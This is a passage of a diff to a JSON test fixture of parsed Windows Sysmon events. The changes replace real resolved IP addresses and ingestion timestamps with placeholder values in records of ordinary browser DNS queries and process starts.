ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5627,7 +5549,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313806572Z", + "ingested": "2021-12-09T13:49:44.739342700Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e3\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.949\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-0010c73e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4860\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e9.01\u003c/Data\u003e\u003cData Name='Description'\u003eSystem activity monitor\u003c/Data\u003e\u003cData Name='Product'\u003eSysinternals Sysmon\u003c/Data\u003e\u003cData Name='Company'\u003eSysinternals - www.sysinternals.com\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=AC93C3B38E57A2715572933DBCB2A1C2892DBC5E\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0010f14d0000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e488\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\services.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\services.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5708,17 +5630,17 @@ "type": "CNAME" }, { - "data": "204.2.197.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.2.197.211", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -5736,14 +5658,13 @@ "idpix.media6degrees.com" ], "ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313808052Z", + "ingested": "2021-12-09T13:49:44.739346500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5807,11 +5728,11 @@ "type": "CNAME" }, { - "data": "172.217.10.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5819,7 +5740,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5827,7 +5748,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5835,7 +5756,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5844,14 +5765,14 @@ } ], "resolved_ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -5868,21 +5789,21 @@ "tpc.googlesyndication.com" ], "ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313809333Z", + "ingested": "2021-12-09T13:49:44.739351200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5983,7 +5904,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-10-14T04:10:32.313811083Z", + "ingested": "2021-12-09T13:49:44.739357200Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e4\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.964\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-00102c412a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5028\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\unsecapp.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eSink to receive asynchronous callbacks for WMI client application\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=6DF8163A6320B80B60733F9D62E2F39B4B16B678\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6053,11 +5974,11 @@ "type": "CNAME" }, { - "data": "162.248.19.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6065,7 +5986,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6073,7 +5994,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6081,7 +6002,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -6090,14 +6011,14 @@ } ], "resolved_ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -6115,21 +6036,21 @@ "image2.pubmatic.com" ], "ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313812396Z", + "ingested": "2021-12-09T13:49:44.739360800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6201,12 +6122,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { @@ -6224,13 +6145,13 @@ "sam.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313813720Z", + "ingested": "2021-12-09T13:49:44.739364600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6290,23 +6211,23 @@ }, "answers": [ { - "data": "52.85.89.250", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.94", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.139", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6314,7 +6235,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6322,7 +6243,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6330,7 +6251,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -6339,17 +6260,17 @@ } ], "resolved_ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -6365,24 +6286,21 @@ "ocsp.sca1b.amazontrust.com" ], "ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + 